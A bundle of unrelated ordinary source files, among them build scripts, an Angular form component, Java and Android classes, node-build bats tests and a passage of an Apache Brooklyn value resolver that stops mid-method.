    if [ "x$need_autoheader" = "xyes" ] ; then
        $VERBOSE_ECHO "$AUTOHEADER $AUTOHEADER_OPTIONS"
        autoheader_output="`$AUTOHEADER $AUTOHEADER_OPTIONS 2>&1`"
        ret=$?
        $VERBOSE_ECHO "$autoheader_output"
        if [ ! $ret = 0 ] ; then $ECHO "ERROR: $AUTOHEADER failed" && exit 2 ; fi
    fi # need_autoheader

    ############
    # automake #
    ############
    # automake is only needed when configure initializes it
    need_automake=no
    for feature in AM_INIT_AUTOMAKE ; do
        $VERBOSE_ECHO "Searching for $feature in $CONFIGURE"
        found="`grep \"^$feature.*\" $CONFIGURE`"
        if [ ! "x$found" = "x" ] ; then
            need_automake=yes
            break
        fi
    done

    if [ "x$need_automake" = "xyes" ] ; then
        $VERBOSE_ECHO "$AUTOMAKE $AUTOMAKE_OPTIONS"
        automake_output="`$AUTOMAKE $AUTOMAKE_OPTIONS 2>&1`"
        ret=$?
        $VERBOSE_ECHO "$automake_output"

        if [ ! $ret = 0 ] ; then

            ###################
            # automake, retry #
            ###################
            $VERBOSE_ECHO
            $VERBOSE_ECHO "$AUTOMAKE $ALT_AUTOMAKE_OPTIONS"
            # retry without the -f
            automake_output="`$AUTOMAKE $ALT_AUTOMAKE_OPTIONS 2>&1`"
            ret=$?
            $VERBOSE_ECHO "$automake_output"

            if [ ! $ret = 0 ] ; then
                # test if libtool is busted
                libtool_failure "$automake_output"

                # let the user know what went wrong
                cat <<EOF
$automake_output
EOF
                $ECHO "ERROR: $AUTOMAKE failed"
                exit 2
            fi # automake retry
        fi # automake ret = 0
    fi # need_automake
} # end of manual_autogen
#####################################
# RECURSIVE_MANUAL_AUTOGEN FUNCTION #
#####################################
recursive_manual_autogen ( ) {

    # run the build preparation steps manually for this directory
    manual_autogen

    # for projects using recursive configure, run the build
    # preparation steps for the subdirectories.
    if [ ! "x$CONFIG_SUBDIRS" = "x" ] ; then
        $VERBOSE_ECHO "Recursively configuring the following directories:"
        $VERBOSE_ECHO " $CONFIG_SUBDIRS"
        for dir in $CONFIG_SUBDIRS ; do
            $VERBOSE_ECHO "Processing recursive configure in $dir"
            cd "$START_PATH"
            cd "$dir"

            # new directory, prepare (re-detects CONFIGURE, aux dir, subdirs)
            initialize

            # run manual steps for the subdir and any others below
            recursive_manual_autogen
        done
    fi
}
################################
# run manual preparation steps #
################################
if [ "x$reconfigure_manually" = "xyes" ] ; then
    $ECHO
    $ECHO $ECHO_N "Preparing build ... $ECHO_C"

    recursive_manual_autogen
fi

#########################
# restore and summarize #
#########################
cd "$START_PATH"

# restore COPYING and INSTALL from backup if necessary
recursive_restore

# make sure we end up with a configure script
# (derive its name by stripping the .ac/.in suffix from the template name)
config_ac="`locate_configure_template`"
config="`echo $config_ac | sed 's/\.ac$//' | sed 's/\.in$//'`"
if [ "x$config" = "x" ] ; then
    $VERBOSE_ECHO "Could not locate the configure template (from `pwd`)"
fi

# summarize
$ECHO "done"
$ECHO

if test "x$config" = "x" -o ! -f "$config" ; then
    $ECHO "WARNING: The $PROJECT build system should now be prepared but there"
    $ECHO "does not seem to be a resulting configure file. This is unexpected"
    $ECHO "and likely the result of an error. You should run $NAME_OF_AUTOGEN"
    $ECHO "with the --verbose option to get more details on a potential"
    $ECHO "misconfiguration."
else
    $ECHO "The $PROJECT build system is now prepared. To build here, run:"
    $ECHO " $config"
    $ECHO " make"
fi

# Local Variables:
# mode: sh
# tab-width: 8
# sh-basic-offset: 4
# sh-indentation: 4
# indent-tabs-mode: t
# End:
# ex: shiftwidth=4 tabstop=8
|
<ul>
<li>apple</li>
<li>banana</li>
<li>orange</li>
</ul> |
#!/usr/bin/env bash
# Run the slim Ruby app image, publishing port 7000; the container is
# removed on exit (--rm) and runs interactively with a TTY (-it).
here="$(dirname "$BASH_SOURCE")"
# Quote the path so a script directory containing spaces does not word-split.
cd "$here"
#eval "$(docker-machine env default)"
docker run -it --rm --name="ruby_app" -p 7000:7000 my/ruby-app.slim
|
#! /bin/bash
# Install test-only Python dependencies and fetch the model/data files
# required by the test suite.
pip3 install -r requirements-tests.txt
python scripts/download_models_and_files.py
|
<reponame>anupsaw/angular2
import { Component } from '@angular/core';
import { NgForm } from '@angular/forms';
import { Router, ActivatedRoute } from '@angular/router';
import { DataService } from '../../global-services/dataService';
import * as _ from 'lodash';
import { DataServerService } from '../../global-services/dataServerService';
@Component({
    templateUrl: 'app/RoutingComponents/user/user.tpl.html'
})
export class UserComponent {
    // Template-driven form model bound by user.tpl.html.
    public user: UserModel;
    private id: number;

    constructor(private _route: Router,
        private _dataService: DataService,
        private _routeData: ActivatedRoute,
        private dataService: DataServerService
    ) {
        this.user = new UserModel();
    }

    ngOnInit() {
        // NOTE(review): route params are the ":id" URL segment values, not a
        // full UserModel -- the callback is typed loosely on purpose; confirm.
        this._routeData.params.subscribe((params: any) => {
            let id = +params.id;
            if (id === 0) {
                // id 0 means "create new": start from a blank model.
                this.user = new UserModel();
            } else {
                this.dataService.getData('user', id).subscribe((user: any) => {
                    if (!_.isEmpty(user)) { this.user = user; }
                });
            }
        });
    }

    saveAndNext() {
        console.log(this.user);
        // Persist the user, then continue the wizard at the /work step.
        this.dataService.postData('user', this.user).subscribe(data => {
            if (data.id) {
                this._route.navigate(['/work', data.id]);
            }
        });
    }
}
// Plain data model backing the user form; fields map 1:1 to template inputs.
export class UserModel {
    public firstName: string;
    public lastName: string;
    public email: string;
    public userName: string;
    public password: string;
    public confirmPassword: string;
    public id: number;
}
<filename>app/decorators/controllers/solidus_dynamic_variants/spree/orders_controller_decorator.rb
# frozen_string_literal: true
module SolidusDynamicVariants
  module Spree
    # Adds a cart-populate action that resolves a product variant dynamically
    # from the submitted option values before adding it to the order.
    module OrdersControllerDecorator
      def variant_populate
        @order = current_order(create_order_if_necessary: true)
        product = ::Spree::Product.find(params[:product_id])
        option_values_ids = params[:options].present? ? params[:options].values : []
        option_values = ::Spree::OptionValue.where(id: option_values_ids)
        variant = product.try_variant option_values
        quantity = params[:quantity].to_i

        # 2,147,483,647 is crazy. See issue #2695.
        if !quantity.between?(1, 2_147_483_647)
          # Must use the top-level ::Spree constant here: inside this module a
          # bare `Spree` resolves lexically to SolidusDynamicVariants::Spree,
          # which does not define .t (the file already uses ::Spree:: above).
          @order.errors.add(:base, ::Spree.t(:please_enter_reasonable_quantity))
        end

        begin
          @line_item = @order.contents.add(variant, quantity)
        rescue ActiveRecord::RecordInvalid => e
          @order.errors.add(:base, e.record.errors.full_messages.join(", "))
        end

        respond_with(@order) do |format|
          format.html do
            if @order.errors.any?
              flash[:error] = @order.errors.full_messages.join(", ")
              redirect_back_or_default(spree.root_path)
              return
            else
              redirect_to cart_path
            end
          end
        end
      end

      ::Spree::OrdersController.prepend self
    end
  end
end
|
# preprocess the cskg graph and put preprocessed graph into output dir
marius_preprocess cskg output_dir/
# run marius on the preprocessed input
marius_train examples/training/configs/cskg_gpu.ini info |
#!/bin/sh
#### written by Daisuke Homma
##
## first, create repo from github.com, click '+' menu to create new repository.
## then run below in the project directory.
## git init
## git commit -m 'first commit'
## git remote add origin https://github.com/<user>/<project>.git
## git push -u origin master
## having done, then run this script.
##
DATE=`date '+%Y/%m/%d %H:%M'`
MESSAGE="committed on ${DATE}."
if [ $# -eq 1 ]; then MESSAGE=$1; fi
git pull
git checkout master
git add .
git commit -a -m "${MESSAGE}"
git push origin master
|
import { Context } from '../../../Context';
import { PiNode } from './PiNode';

// Unit test for the constant-emitting PI node.
describe('Pi Node', () => {
    test('Should return PI as output', () => {
        const context = new Context();
        const piNode = new PiNode(context);

        // The node exposes the constant on its `pi` output port.
        expect(piNode.outputPorts.pi.value).toBe(Math.PI);
    });
});
|
/**
* ychen.
* Copyright (c).
*/
package cn.edu.fudan.iipl.util;
import cn.edu.fudan.iipl.entity.Article;
import cn.edu.fudan.iipl.form.ArticleForm;
/**
 * Converter between article form objects and article entities.
 *
 * @author racing
 * @version $Id: ArticleConvertor.java, v 0.1 Aug 8, 2015 6:49:01 PM racing Exp $
 */
public class ArticleConvertor {

    /**
     * Converts an {@link ArticleForm} into an {@link Article} entity by
     * copying every form field onto a freshly created article.
     *
     * @param form the submitted article form
     * @return a new Article populated from the form
     */
    public static Article convertArticleFormToArticle(ArticleForm form) {
        Article result = new Article();
        result.setTitle(form.getTitle());
        result.setMainBody(form.getMainBody());
        result.setCategory(form.getCategory());
        result.setGmtCreate(form.getGmtCreate());
        result.setGmtModify(form.getGmtModify());
        result.setAuthor(form.getAuthor());
        return result;
    }
}
|
from LightPipes import *

GridSize = 30*mm
GridDimension = 5
lambda_ = 500*nm  # lambda_ is used because lambda is a Python built-in keyword.


def _version_tuple(version):
    """Parse a dotted version string into a tuple of ints.

    Non-numeric characters within a component are dropped; parsing stops at
    the first component with no digits. This makes version comparisons
    numeric instead of lexicographic (a plain string compare would order
    "10.0.0" before "2.0.0").
    """
    parts = []
    for piece in str(version).split("."):
        digits = "".join(ch for ch in piece if ch.isdigit())
        if not digits:
            break
        parts.append(int(digits))
    return tuple(parts)


Field = Begin(GridSize, lambda_, GridDimension)
print("LightPipes version = ", LPversion)
# LightPipes < 2.0.0 returned the raw field; newer versions wrap it in an
# object exposing a .field attribute.
if _version_tuple(LPversion) < (2, 0, 0):
    print(Field)
else:
    print(Field.field)
LPtest()
LPdemo()
|
#!/bin/bash
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.

# Abort immediately if any command fails.
set -e

# System packages required for the native build (cmake, toolchain, boost, etc.).
APT_PACKAGES="cmake-curses-gui cmake-qt-gui build-essential libnuma-dev libmnl-dev libelf-dev libboost-dev libboost-program-options-dev libboost-coroutine-dev libboost-system-dev libboost-chrono-dev libyaml-cpp-dev libpcap-dev"
repo_root=$(git rev-parse --show-toplevel)
apt-get -y install $APT_PACKAGES
#$SHELL ${repo_root}/submodules/spdk/scripts/pkgdep.sh
|
<gh_stars>0
// Doxygen navigation/index data for the armnn::BaseMemoryManager class page.
// Each entry is [ display text, target xhtml anchor, child-entries-or-null ].
// Appears to be auto-generated by Doxygen -- regenerate rather than hand-edit.
var classarmnn_1_1_base_memory_manager =
[
    [ "MemoryAffinity", "classarmnn_1_1_base_memory_manager.xhtml#aaadc6dca70e0b3cc64ae0aba17be0aae", [
      [ "Buffer", "classarmnn_1_1_base_memory_manager.xhtml#aaadc6dca70e0b3cc64ae0aba17be0aaea7e62bc342f41c946868f0ea6f0b712d8", null ],
      [ "Offset", "classarmnn_1_1_base_memory_manager.xhtml#aaadc6dca70e0b3cc64ae0aba17be0aaeadfd0a82c4bf37b1e90b690a22a20692e", null ]
    ] ],
    [ "BaseMemoryManager", "classarmnn_1_1_base_memory_manager.xhtml#a0e2288f38bd63b43207e265a221792a5", null ],
    [ "~BaseMemoryManager", "classarmnn_1_1_base_memory_manager.xhtml#a00a469f202ef1876876cc8a3148bdc36", null ],
    [ "BaseMemoryManager", "classarmnn_1_1_base_memory_manager.xhtml#a803e316b06838334bdf3b8febb0791ee", null ],
    [ "Acquire", "classarmnn_1_1_base_memory_manager.xhtml#a21dfb49c3ec675ca25a5eb618fe52b07", null ],
    [ "CreateArmComputeMemoryManager", "classarmnn_1_1_base_memory_manager.xhtml#a9380bc07faf4483a49d4bef4db7d87f3", null ],
    [ "CreateMemoryGroup", "classarmnn_1_1_base_memory_manager.xhtml#a8194156cbc7688e1a2107589237d5db7", null ],
    [ "GetInterLayerManager", "classarmnn_1_1_base_memory_manager.xhtml#a3107a84f3ebba890f5056e81a89854b3", null ],
    [ "GetInterLayerMemoryGroup", "classarmnn_1_1_base_memory_manager.xhtml#a481f11f45ac6c278d41e97545429e4ad", null ],
    [ "GetIntraLayerManager", "classarmnn_1_1_base_memory_manager.xhtml#a59ad43b7336a480674d77d18ab1b022d", null ],
    [ "Release", "classarmnn_1_1_base_memory_manager.xhtml#a1a5dddc8911f6189f9ca01394c59faaf", null ],
    [ "m_Allocator", "classarmnn_1_1_base_memory_manager.xhtml#a3c2592601336ba9c115dcb714a1eb20f", null ],
    [ "m_InterLayerMemoryGroup", "classarmnn_1_1_base_memory_manager.xhtml#a2fb34dc01d4d29d2de9eb6b29a106634", null ],
    [ "m_InterLayerMemoryMgr", "classarmnn_1_1_base_memory_manager.xhtml#a078a5c4f5cce47d82cd4b3002bcb827a", null ],
    [ "m_IntraLayerMemoryMgr", "classarmnn_1_1_base_memory_manager.xhtml#afcae38d24590739d2f0aa4362b6a58ed", null ]
];
#!/bin/sh
# Settings
WORKING_DIR=$(pwd)
BULLET_PROJ_DIR=$WORKING_DIR/bullet/proj

# Parse command-line options, setting NUM_THREADS, CLEAN and CONFIG:
#   -numthreads N : parallel make jobs (default 1)
#   -clean        : run `make clean` before building
#   -config NAME  : build configuration (default release)
init() {
    NUM_THREADS="1"
    CLEAN=""
    CONFIG="release"

    while test $# -gt 0; do
        case "$1" in
            "-numthreads")
                NUM_THREADS="$2"
                shift ;;
            "-clean")
                CLEAN="yes"
                ;;
            "-config")
                CONFIG="$2"
                shift ;;
        esac
        shift # Shifts command line arguments var or something whatever
    done
}
# Print usage and exit. NOTE(review): this function is never invoked, and
# its text does not mention -clean/-config -- confirm whether it is stale.
usage() {
    echo "Usage: $0 <num threads>"
    exit 1
}
# Build the bundled Bullet library using premake-generated gmake makefiles.
# Honors CLEAN, NUM_THREADS and CONFIG set by init().
build_bullet() {
    # Quote the operand: an unquoted empty variable degenerates `test -n`
    # to a one-argument test that is always true, sending us into a bogus cd.
    if test -n "$BULLET_PROJ_DIR"; then
        cd "$BULLET_PROJ_DIR"
        ./premake4 gmake
        cd gmake
        if test -n "$CLEAN"; then
            make clean
        fi
        make -j$NUM_THREADS "config=$CONFIG"
    fi
}
# Build the vphysics sources against the previously built Bullet libraries.
build_vphysics() {
    cd "$WORKING_DIR/src"
    if test -n "$CLEAN"; then
        make clean
    fi
    make -j$NUM_THREADS "CONFIGURATION=$CONFIG"
}

# Parse arguments, build Bullet then vphysics, and return to the start dir.
init $*
build_bullet
build_vphysics
cd "$WORKING_DIR"
|
<gh_stars>10-100
package io.opensphere.wps.streaming.impl;
import java.io.IOException;
import java.net.HttpURLConnection;
import java.net.URISyntaxException;
import java.net.URL;
import org.apache.log4j.Logger;
import io.opensphere.core.server.HttpServer;
import io.opensphere.core.server.ResponseValues;
import io.opensphere.core.server.ServerCreator;
import io.opensphere.core.server.ServerProvider;
import io.opensphere.core.server.ServerProviderRegistry;
import io.opensphere.core.server.StreamHandler;
import io.opensphere.core.util.io.CancellableInputStream;
import io.opensphere.core.util.lang.StringUtilities;
import io.opensphere.wps.streaming.Streamer;
import io.opensphere.wps.streaming.SubscriptionContext;
/**
 * This class is a runnable class that can be scheduled to retrieve new NRT data
 * at a given polling interval.
 */
public class StreamerImpl implements Streamer
{
    /**
     * Used to log messages.
     */
    private static final Logger LOGGER = Logger.getLogger(StreamerImpl.class);

    /**
     * The default buffer size to use.
     */
    protected static final int ourDefaultBufferSize = 1530;

    /**
     * Contains the url to use to get new streaming data.
     */
    private final SubscriptionContext myContext;

    /**
     * The object to send the results to.
     */
    private final StreamHandler myHandler;

    /**
     * Indicates if this streamer should still keep running.
     */
    private boolean myIsRunning = true;

    /**
     * Used to get the server object.
     */
    private final ServerProviderRegistry myRegistry;

    /**
     * Constructs a new streamer class.
     *
     * @param context Contains the url to use to get new data.
     * @param handler The object to send the results to.
     * @param registry Used to get the server to make the polling requests.
     */
    public StreamerImpl(SubscriptionContext context, StreamHandler handler, ServerProviderRegistry registry)
    {
        myContext = context;
        myHandler = handler;
        myRegistry = registry;
    }

    @Override
    public SubscriptionContext getContext()
    {
        return myContext;
    }

    /**
     * Gets the handler.
     *
     * @return The handler.
     */
    public StreamHandler getHandler()
    {
        return myHandler;
    }

    @Override
    public void start() throws IOException
    {
        myIsRunning = true;
        doStreaming();
    }

    @Override
    public void stop()
    {
        // doStreaming() rechecks this flag before each request, so the loop
        // exits after the in-flight request (if any) completes.
        myIsRunning = false;
    }

    /**
     * Streams the data. Repeatedly issues GET requests against the
     * subscription's stream URL until {@link #stop()} is called, handing each
     * successful response stream to the handler. Consecutive failures are
     * retried after sleeping the poll interval; the fifth consecutive failure
     * aborts the stream with an IOException. A success resets the failure
     * count.
     *
     * @throws IOException If an unrecoverable exception occurs during
     *             streaming.
     */
    @SuppressWarnings("unchecked")
    private void doStreaming() throws IOException
    {
        URL url = myContext.getStreamUrl();
        ServerProvider<HttpServer> provider = myRegistry.getProvider(HttpServer.class);
        HttpServer server = null;
        if (provider instanceof ServerCreator)
        {
            // Create a dedicated server so a custom buffer size can be applied
            // (overridable via the nrtBufferSize system property).
            server = ((ServerCreator<HttpServer>)provider).createServer(url);
            int bufferSize = Integer.parseInt(System.getProperty("nrtBufferSize", String.valueOf(ourDefaultBufferSize)));
            server.setBufferSize(bufferSize);
        }
        else
        {
            server = provider.getServer(url);
        }

        int failureCount = 0;
        while (myIsRunning)
        {
            ResponseValues response = new ResponseValues();
            try
            {
                @SuppressWarnings("PMD.PrematureDeclaration")
                long t0 = System.nanoTime();
                long t1;
                if (LOGGER.isDebugEnabled())
                {
                    LOGGER.debug("Requesting NRT features from " + url);
                }
                try (CancellableInputStream stream = server.sendGet(url, response))
                {
                    if (response.getResponseCode() == HttpURLConnection.HTTP_OK)
                    {
                        myHandler.newData(myContext.getStreamId(), stream);
                        t1 = System.nanoTime();
                        // a success resets the consecutive-failure counter
                        failureCount = 0;
                    }
                    else
                    {
                        t1 = System.nanoTime();
                        failureCount++;
                        LOGGER.error("Server returned " + response.getResponseCode() + " " + response.getResponseMessage()
                                + " for url " + url);
                        if (failureCount >= 5)
                        {
                            throw new IOException("Stream was lost for " + url);
                        }
                        else
                        {
                            try
                            {
                                Thread.sleep(myContext.getPollInterval());
                            }
                            catch (InterruptedException e1)
                            {
                                // NOTE(review): the thread's interrupt status
                                // is not restored here -- confirm intentional.
                                if (LOGGER.isDebugEnabled())
                                {
                                    LOGGER.debug(e1.getMessage(), e1);
                                }
                            }
                        }
                    }
                }
                if (LOGGER.isDebugEnabled())
                {
                    LOGGER.debug(StringUtilities.formatTimingMessage("NRT features received from " + url + " in ", t1 - t0));
                }
            }
            catch (IOException | URISyntaxException e)
            {
                failureCount++;
                LOGGER.error("Error occurred for " + url + " " + e.getMessage(), e);
                if (failureCount >= 5)
                {
                    throw new IOException(e.getMessage(), e);
                }
                else
                {
                    try
                    {
                        Thread.sleep(myContext.getPollInterval());
                    }
                    catch (InterruptedException e1)
                    {
                        if (LOGGER.isDebugEnabled())
                        {
                            LOGGER.debug(e1.getMessage(), e1);
                        }
                    }
                }
            }
        }
    }
}
|
public class Permutations {
    public static void main(String[] args) {
        String str = "ABC";
        int n = str.length();
        Permutations permutation = new Permutations();
        permutation.permute(str, 0, n - 1);
    }

    /**
     * Recursively prints every permutation of the characters between
     * indices l and r (inclusive), fixing one character per level.
     */
    private void permute(String str, int l, int r)
    {
        if (l == r) {
            System.out.println(str);
            return;
        }
        for (int i = l; i <= r; i++) {
            // swap returns a fresh string, so the caller's copy is never
            // modified and no explicit "undo" swap is needed.
            String fixed = swap(str, l, i);
            permute(fixed, l + 1, r);
        }
    }

    /**
     * Returns a copy of the given string with the characters at
     * positions i and j exchanged.
     */
    public String swap(String a, int i, int j)
    {
        char[] letters = a.toCharArray();
        char held = letters[i];
        letters[i] = letters[j];
        letters[j] = held;
        return new String(letters);
    }
}
#!/usr/bin/env bats
load test_helper
# Never consult the download mirror and disable the download cache so each
# test exercises the real fetch code paths.
export NODE_BUILD_SKIP_MIRROR=1
export NODE_BUILD_CACHE_PATH=
# Give every test a throwaway build directory under the bats tmpdir.
setup() {
  export NODE_BUILD_BUILD_PATH="${BATS_TMPDIR}/source"
  mkdir -p "${NODE_BUILD_BUILD_PATH}"
}
# curl is stubbed to fail, so the install must abort with a download error.
@test "failed download displays error message" {
  stub curl false
  install_fixture definitions/without-checksum
  assert_failure
  assert_output --partial "> http://example.com/packages/package-1.0.0.tar.gz"
  assert_output --partial "error: failed to download package-1.0.0.tar.gz"
}
# With curl, wget and aria2c all removed from PATH, a helpful error is shown.
@test "no download tool" {
  skip "This test fails on ubuntu-20 for some reason"
  export -n NODE_BUILD_HTTP_CLIENT
  clean_path="$(remove_commands_from_path curl wget aria2c)"
  PATH="$clean_path" install_fixture definitions/without-checksum
  assert_failure
  assert_output --partial 'error: install `curl`, `wget`, or `aria2c` to download packages'
}
# aria2c is stubbed to "download" by copying the fixture tarball into place.
@test "using aria2c if available" {
  export NODE_BUILD_ARIA2_OPTS=
  export -n NODE_BUILD_HTTP_CLIENT
  stub aria2c "--allow-overwrite=true --no-conf=true -o * http://example.com/* : cp $FIXTURE_ROOT/\${5##*/} \$4"
  install_fixture definitions/without-checksum
  assert_success
  assert_output - <<OUT
Downloading package-1.0.0.tar.gz...
-> http://example.com/packages/package-1.0.0.tar.gz
Installing package-1.0.0...
Installed package-1.0.0 to ${BATS_TMPDIR}/install
OUT
  unstub aria2c
}
# A fresh clone is expected when the package directory does not exist yet.
@test "fetching from git repository" {
  stub git "clone --depth 1 --branch master http://example.com/packages/package.git package-dev : mkdir package-dev"
  run_inline_definition <<DEF
install_git "package-dev" "http://example.com/packages/package.git" master copy
DEF
  assert_success
  assert_output - <<OUT
Cloning http://example.com/packages/package.git...
Installing package-dev...
Installed package-dev to ${BATS_TMPDIR}/install
OUT
  unstub git
}
# When the package directory already exists, fetch+checkout is used instead
# of a fresh clone.
@test "updating existing git repository" {
  mkdir -p "${NODE_BUILD_BUILD_PATH}/package-dev"
  stub git \
    "fetch --depth 1 origin +master : true" \
    "checkout -q -B master origin/master : true"
  run_inline_definition <<DEF
install_git "package-dev" "http://example.com/packages/package.git" master copy
DEF
  assert_success
  assert_output - <<OUT
Cloning http://example.com/packages/package.git...
Installing package-dev...
Installed package-dev to ${BATS_TMPDIR}/install
OUT
  unstub git
}
|
// Copyright (c) Microsoft Corporation. All rights reserved.
// Licensed under the MIT License.
import { TabStopsRequirementResult } from 'DetailsView/tab-stops-requirement-result';
export class TabStopsFailedCounter {
    /**
     * Counts the failed instances recorded for one specific requirement.
     */
    public getFailedByRequirementId = (
        results: TabStopsRequirementResult[],
        requirementId: string,
    ): number => {
        let total = 0;
        for (const result of results) {
            if (result.id === requirementId) {
                total += result.instances.length;
            }
        }
        return total;
    };

    /**
     * Counts the failed instances across every requirement result.
     */
    public getTotalFailed = (results: TabStopsRequirementResult[]): number => {
        let total = 0;
        for (const result of results) {
            total += result.instances.length;
        }
        return total;
    };
}
|
package me.eirinimitsopoulou.bakingapp.Adapaters;
import android.content.Context;
import android.support.v7.widget.CardView;
import android.support.v7.widget.RecyclerView;
import android.view.LayoutInflater;
import android.view.View;
import android.view.ViewGroup;
import android.widget.TextView;
import me.eirinimitsopoulou.bakingapp.R;
import me.eirinimitsopoulou.bakingapp.Data.Steps;
import butterknife.BindView;
import butterknife.ButterKnife;
/**
* Created by eirinimitsopoulou on 30/05/2018.
*/
/**
 * RecyclerView adapter showing one row per recipe step (its short
 * description) and forwarding row clicks to an optional listener.
 */
public class StepsAdapter extends RecyclerView.Adapter<StepsAdapter.RecipeStepViewHolder> {

    private final Context mContext;
    private final Steps[] mStepList;
    private OnItemClickListener mListener;
    // Position of the most recently clicked step; -1 until a click occurs.
    // NOTE(review): written but never read during binding — confirm whether
    // selection highlighting was intended.
    private int mSelectedItemPosition = -1;

    /**
     * @param context  context used to inflate item views
     * @param stepList the recipe steps to display
     */
    public StepsAdapter(Context context, Steps[] stepList) {
        mContext = context;
        mStepList = stepList;
    }

    /** Registers the callback invoked when a step row is clicked. */
    public void setOnStepClickListener(OnItemClickListener listener) {
        mListener = listener;
    }

    @Override
    public RecipeStepViewHolder onCreateViewHolder(ViewGroup parent, int viewType) {
        View view = LayoutInflater.from(mContext).inflate(R.layout.step_list_item, parent, false);
        return new RecipeStepViewHolder(view);
    }

    @Override
    public void onBindViewHolder(RecipeStepViewHolder holder, int position) {
        holder.description.setText(mStepList[position].getShortDescription());
    }

    @Override
    public int getItemCount() {
        return mStepList.length;
    }

    public class RecipeStepViewHolder extends RecyclerView.ViewHolder implements View.OnClickListener {
        @BindView(R.id.step_list_item)
        CardView card;
        @BindView(R.id.step_short_description)
        TextView description;

        public RecipeStepViewHolder(View itemView) {
            super(itemView);
            ButterKnife.bind(this, itemView);
            card.setOnClickListener(this);
        }

        @Override
        public void onClick(View view) {
            // BUG FIX: getAdapterPosition() returns NO_POSITION (-1) while a
            // layout pass or removal is pending; the original could forward
            // -1 to the listener and record it as the selection.
            int position = getAdapterPosition();
            if (mListener != null && position != RecyclerView.NO_POSITION) {
                mListener.onRecipeStepClicked(position);
                mSelectedItemPosition = position;
                notifyDataSetChanged();
            }
        }
    }

    public interface OnItemClickListener {
        void onRecipeStepClicked(int position);
    }
}
|
def __init__(self, foo, bar, baz, boom=1, bang=2):
    # Bulk-assign every constructor argument onto the instance in one call.
    # NOTE(review): attributesFromDict is defined elsewhere; presumably it
    # sets each entry of locals() (except 'self') as an instance attribute —
    # confirm its exact behavior.
    attributesFromDict(locals())
|
<filename>src/main/java/de/siphalor/spiceoffabric/client/compat/REIPlugin.java<gh_stars>0
package de.siphalor.spiceoffabric.client.compat;
import de.siphalor.spiceoffabric.SpiceOfFabric;
import me.shedaniel.rei.api.client.plugins.REIClientPlugin;
import me.shedaniel.rei.api.client.registry.entry.EntryRegistry;
import me.shedaniel.rei.api.common.util.EntryStacks;
import net.fabricmc.api.EnvType;
import net.fabricmc.api.Environment;
import net.minecraft.item.ItemStack;
import net.minecraft.item.Items;
import net.minecraft.nbt.NbtCompound;
@Environment(EnvType.CLIENT)
public class REIPlugin implements REIClientPlugin {
    @Override
    public void registerEntries(EntryRegistry entryRegistry) {
        // Build the food-journal written book so it shows up as an REI entry.
        ItemStack journal = new ItemStack(Items.WRITTEN_BOOK);
        NbtCompound bookNbt = journal.getOrCreateNbt();
        bookNbt.putBoolean(SpiceOfFabric.FOOD_JOURNAL_FLAG, true);
        bookNbt.putString("title", "");
        bookNbt.putString("author", "Me");
        // Display name is a JSON text component.
        journal.getOrCreateSubNbt("display").putString("Name", "{\"translate\":\"Diet Journal\",\"bold\":true}");
        entryRegistry.addEntries(EntryStacks.of(journal));
    }
}
|
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package brooklyn.util.task;
import java.util.List;
import java.util.Map;
import java.util.Set;
import java.util.concurrent.Callable;
import java.util.concurrent.Future;
import java.util.concurrent.atomic.AtomicBoolean;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import brooklyn.management.ExecutionContext;
import brooklyn.management.Task;
import brooklyn.management.TaskAdaptable;
import brooklyn.util.exceptions.Exceptions;
import brooklyn.util.flags.TypeCoercions;
import brooklyn.util.guava.Maybe;
import brooklyn.util.time.CountdownTimer;
import brooklyn.util.time.Duration;
import brooklyn.util.time.Durations;
import com.google.common.collect.Lists;
import com.google.common.collect.Maps;
import com.google.common.collect.Sets;
import com.google.common.reflect.TypeToken;
/**
* Resolves a given object, as follows:
* <li> If it is a {@link Tasks} or a {@link DeferredSupplier} then get its contents
* <li> If it's a map and {@link #deep(boolean)} is requested, it applies resolution to contents
* <li> It applies coercion
* <p>
* Fluent-style API exposes a number of other options.
*/
public class ValueResolver<T> implements DeferredSupplier<T> {

    private static final Logger log = LoggerFactory.getLogger(ValueResolver.class);

    // The raw value to be resolved, and the type it should be coerced to.
    final Object value;
    final Class<T> type;
    ExecutionContext exec;
    String description;
    boolean forceDeep;
    /** null means do it if you can; true means always, false means never */
    Boolean embedResolutionInTask;
    /** timeout on execution, if possible, or if embedResolutionInTask is true */
    Duration timeout;

    T defaultValue = null;
    boolean returnDefaultOnGet = false;
    boolean swallowExceptions = false;

    // internal fields
    final Object parentOriginalValue;
    final CountdownTimer parentTimer;
    // Guards single-use semantics of getMaybe().
    AtomicBoolean started = new AtomicBoolean(false);
    boolean expired;

    ValueResolver(Object v, Class<T> type) {
        this.value = v;
        this.type = type;
        checkTypeNotNull();
        parentOriginalValue = null;
        parentTimer = null;
    }

    // Child resolver used for nested (deep) resolution; inherits the parent's
    // settings and shares its countdown timer so the overall timeout applies.
    ValueResolver(Object v, Class<T> type, ValueResolver<?> parent) {
        this.value = v;
        this.type = type;
        checkTypeNotNull();
        exec = parent.exec;
        description = parent.description;
        forceDeep = parent.forceDeep;
        embedResolutionInTask = parent.embedResolutionInTask;
        parentOriginalValue = parent.getOriginalValue();
        timeout = parent.timeout;
        parentTimer = parent.parentTimer;
        if (parentTimer!=null && parentTimer.isExpired())
            expired = true;
        // default value and swallow exceptions do not need to be nested
    }

    /** Fluent helper: holds a value until the target type is supplied via as(). */
    public static class ResolverBuilderPretype {
        final Object v;
        public ResolverBuilderPretype(Object v) {
            this.v = v;
        }
        public <T> ValueResolver<T> as(Class<T> type) {
            return new ValueResolver<T>(v, type);
        }
    }

    /** returns a copy of this resolver which can be queried, even if the original (single-use instance) has already been copied */
    public ValueResolver<T> clone() {
        // NOTE(review): parentOriginalValue/parentTimer are not carried over;
        // the copy behaves as a fresh top-level resolver.
        ValueResolver<T> result = new ValueResolver<T>(value, type)
            .context(exec).description(description)
            .embedResolutionInTask(embedResolutionInTask)
            .deep(forceDeep)
            .timeout(timeout);
